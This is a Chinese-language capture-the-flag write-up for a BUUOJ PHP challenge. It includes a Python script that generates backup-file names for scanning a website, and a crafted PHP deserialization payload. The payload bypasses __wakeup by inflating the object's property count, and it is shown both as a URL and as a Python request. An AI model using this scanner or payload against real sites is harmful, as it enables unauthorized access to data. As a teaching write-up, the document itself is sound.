[buuoj]极客大挑战 2019]PHP 1
知识点:
1、直接扫描目录得到网站源码
2、public、protected与private在序列化时的区别
3、__wakeup()方法绕过
复现:
首先根据提示网站备份文件,考虑扫描备份文件
首先我们需要一个网站备份文件的爆破字典
可以用脚本实现:
import sys
import imp
imp.reload(sys)
import os
import os.path
import requests
from urllib.parse import unquote
suffixList = ['.rar','.zip','.tar','.tar.gz']
keyList = ['www','wwwroot','site','web','website','backup','data','mdb','WWW','新建文件夹','ceshi','databak',
'db','database','sql','bf','备份','1','2','11','111','a','123','test','admin','app','bbs','htdocs','wangzhan']
def run(url):
num1 = url.find('.')
num2 = url.find('.', num1 + 1)
keyList.append(url[num1 + 1:num2])
keyList.append(url)
keyList.append(url.replace('.', '_'))
keyList.append(url.replace('.', ''))
keyList.append(url[num1 + 1:])
keyList.append(url[num1 + 1:].replace('.', '_'))
#用法 python3 bfuzz.py www.baidu.com
url =sys.argv[1]
run(url)
tempList = []
for key in keyList:
for suff in suffixList:
tempList.append(key + suff)
fobj = open(url+".txt" , 'w')
for each in tempList:
fobj.write('%s%s' % (each,'\n'))
fobj.flush()
然后用这个字典去扫描网站
![[buuoj]极客大挑战 2019]PHP 1_第1张图片](http://img.e-com-net.com/image/info8/3ebf98e57c98444bbfb75cc029f4d5bb.jpg)
发现一个www.zip文件
下载下来,里面有index.php,flag.php和class.php,其中flag.php给的是假的flag
看index.php,看到一个反序列化
<?php
include 'class.php';
$select = $_GET['select'];
$res=unserialize(@$select);
?>
查看class.php
include 'flag.php';
error_reporting(0);
class Name{
private $username = 'nonono';
private $password = 'yesyes';
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
function __wakeup(){
$this->username = 'guest';
}
function __destruct(){
if ($this->password != 100) {
echo "NO!!!hacker!!!";
echo "You name is: ";
echo $this->username;echo "";
echo "You password is: ";
echo $this->password;echo "";
die();
}
if ($this->username === 'admin') {
global $flag;
echo $flag;
}else{
echo "hello my friend~~sorry i can't give you the flag!";
die();
}
}
}
?>
分析代码应该是要求我们username=admin,password=100时得到flag
但是wakeup方法会导致username成为guest,因此需要通过序列化字符串中对象的个数来绕过该方法。
构造
class Name
{
private $username = 'admin';
private $password = '100';
}
$a = new Name();
echo serialize($a);
#进行url编码,防止%00对应的不可打印字符在复制时丢失
echo urlencode(serialize($a));
#未编码的情况
//O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}
//Name后面的2在链接中要改成3
?>
访问
http://db9f7f6c-53c9-44ba-8a8b-3bfb5743d65b.node3.buuoj.cn/index.php?select=O%3A4%3A%22Name%22%3A3%3A{s%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B}
得到flag
![[buuoj]极客大挑战 2019]PHP 1_第2张图片](http://img.e-com-net.com/image/info8/094d6b6cda50437d923d0604b0c2eceb.jpg)
也可以通过python提交:
import requests
url ="http://db9f7f6c-53c9-44ba-8a8b-3bfb5743d65b.node3.buuoj.cn"
html = requests.get(url+'?select=O:4:"Name":3:{s:14:"\0Name\0username";s:5:"admin";s:14:"\0Name\0password";i:100;}')
print(html.text)
总结:
1、__wakeup()方法绕过
作用:
与__sleep()函数相反,__sleep()函数,是在序序列化时被自动调用。__wakeup()函数,在反序列化时,被自动调用。
绕过:
当反序列化字符串,表示属性个数的值大于真实属性个数时,会跳过 __wakeup 函数的执行。
所以在上面name后面的2表示有2个属性,我们改成3之后他会绕过__wakeup()
2、public、protected与private在序列化时的区别
protected 声明的字段为保护字段,在所声明的类和该类的子类中可见,但在该类的对象实例中不可见。因此保护字段的字段名在序列化时,字段名前面会加上\0*\0的前缀。这里的 \0 表示 ASCII 码为 0 的字符(不可见字符),而不是 \0 组合。这也许解释了,为什么如果直接在网址上,传递\0*\0username会报错,因为实际上并不是\0,只是用它来代替ASCII值为0的字符。必须用python传值才可以。
private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时,类名和字段名前面都会加上\0的前缀。字符串长度也包括所加前缀的长度。其中 \0 字符也是计算长度的。
![[buuoj]极客大挑战 2019]PHP 1_第3张图片](http://img.e-com-net.com/image/info8/c612bc278a064b2e93f58f23e97e3ff8.jpg)
可以看到private变量在序列化的时候是在前面有不可见字符的,所以最好给他用url编码再访问,或者使用:
O:4:"Name":3:{
s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
当然,像上面使用python提交也是可以的